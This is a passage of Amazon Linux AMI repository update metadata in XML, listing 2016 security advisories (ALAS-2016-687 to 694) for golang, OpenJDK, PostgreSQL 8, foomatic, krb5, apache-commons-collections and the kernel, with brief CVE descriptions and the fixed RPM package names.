release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package 
name="samba-winbind-modules" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.10-6.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-687</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-687: medium priority package update for golang</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2016-3959:
1324343:
CVE-2016-3959 golang: infinite loop in several big integer routines
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3959" title="" id="CVE-2016-3959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.5.3" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.5.3-1.21.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.5.3-1.21.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.5.3" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.5.3-1.21.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.5.3-1.21.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.5.3-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-688</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-688: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI 
that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3426:
1328059:
CVE-2016-3426 OpenJDK: non-constant time GCM authentication tag comparison (JCE, 8143945)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3426" title="" id="CVE-2016-3426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.91-0.b14.10.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-689</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-689: important priority package update for postgresql8</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2016-0773:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the PostgreSQL handling code for regular expressions. A remote attacker could use a specially crafted regular expression to cause PostgreSQL to crash or possibly execute arbitrary code.
1303832:
CVE-2016-0773 postgresql: case insensitive range handling integer overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0773" title="" id="CVE-2016-0773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-libs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="5.52.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="5.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql8-test-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-5.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-690</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-690: medium priority package update for foomatic</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8560:
It was discovered that foomatic-rip failed to remove all shell special characters from inputs used to construct command lines for external programs run by the filter. An attacker could possibly use this flaw to execute arbitrary commands.
1291227:
CVE-2015-8560 cups-filters: foomatic-rip did not consider semicolon as illegal shell escape character
CVE-2010-5325:
It was discovered that the unhtmlify() function of foomatic-rip did not correctly calculate buffer sizes, possibly leading to a heap-based memory corruption. A malicious attacker could exploit this flaw to cause foomatic-rip to crash or, possibly, execute arbitrary code.
1218297:
CVE-2010-5325 foomatic: potential remote arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5325" title="" id="CVE-2010-5325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8560" title="" id="CVE-2015-8560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="foomatic" version="4.0.4" release="5.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/foomatic-4.0.4-5.11.amzn1.x86_64.rpm</filename></package><package name="foomatic-debuginfo" version="4.0.4" release="5.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/foomatic-debuginfo-4.0.4-5.11.amzn1.x86_64.rpm</filename></package><package name="foomatic-debuginfo" version="4.0.4" release="5.11.amzn1" epoch="0" arch="i686"><filename>Packages/foomatic-debuginfo-4.0.4-5.11.amzn1.i686.rpm</filename></package><package name="foomatic" version="4.0.4" release="5.11.amzn1" epoch="0" arch="i686"><filename>Packages/foomatic-4.0.4-5.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-691</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-691: medium priority package update for krb5</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8631:
A memory leak flaw was found in the krb5_unparse_name() function of the MIT Kerberos kadmind service. An authenticated attacker could repeatedly send specially crafted requests to the server, which could cause the server to consume large amounts of memory resources, ultimately leading to a denial of service due to memory exhaustion.
1302642:
CVE-2015-8631 krb5: Memory leak caused by supplying a null principal name in request
CVE-2015-8630:
A NULL pointer dereference flaw was found in the procedure used by the MIT Kerberos kadmind service to store policies: the kadm5_create_principal_3() and kadm5_modify_principal() functions did not ensure that a policy was given when KADM5_POLICY was set. An authenticated attacker with permissions to modify the database could use this flaw to add or modify a principal with a policy set to NULL, causing the kadmind service to crash.
1302632:
CVE-2015-8630 krb5: krb5 doesn't check for null policy when KADM5_POLICY is set in the mask
CVE-2015-8629:
An out-of-bounds read flaw was found in the kadmind service of MIT Kerberos. An authenticated attacker could send a maliciously crafted message to force kadmind to read beyond the end of allocated memory, and write the memory contents to the KDC database if the attacker has write permission, leading to information disclosure.
1302617:
CVE-2015-8629 krb5: xdr_nullstring() doesn't check for terminating null character
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8629" title="" id="CVE-2015-8629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8630" title="" id="CVE-2015-8630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8631" title="" id="CVE-2015-8631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="12.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/krb5-libs-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.13.2-12.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-692</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-692: important priority package update for apache-commons-collections</title><issued date="2016-04-27 16:15:00" /><updated date="2016-04-27 16:15:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-commons-collections-javadoc" version="3.2.2" release="3.10.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-javadoc-3.2.2-3.10.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections" version="3.2.2" release="3.10.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-3.2.2-3.10.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-testframework" version="3.2.2" release="3.10.amzn1" epoch="0" 
arch="noarch"><filename>Packages/apache-commons-collections-testframework-3.2.2-3.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-693</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-693: critical priority package update for java-1.7.0-openjdk</title><issued date="2016-04-27 16:15:00" /><updated date="2016-04-27 16:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.101-2.6.6.1.67.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package 
name="java-1.7.0-openjdk-demo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-694</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-694: medium priority package update for kernel</title><issued date="2016-04-27 16:15:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7117:
A use-after-free vulnerability was found in the kernel&#039;s socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within the __sys_recvmmsg() function.
1382268:
CVE-2016-7117 kernel: Use-after-free in the recvmmsg exit path
CVE-2016-3672:
1324749:
CVE-2016-3672 kernel: unlimiting the stack disables ASLR
CVE-2016-3156:
1318172:
CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface
CVE-2016-3135:
1317386:
CVE-2016-3135 kernel: netfilter: size overflow in x_tables
CVE-2016-3134:
1317383:
CVE-2016-3134 kernel: netfilter: missing bounds check in ipt_entry structure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3134" title="" id="CVE-2016-3134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3135" title="" id="CVE-2016-3135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3156" title="" id="CVE-2016-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3672" title="" id="CVE-2016-3672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7117" title="" id="CVE-2016-7117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package 
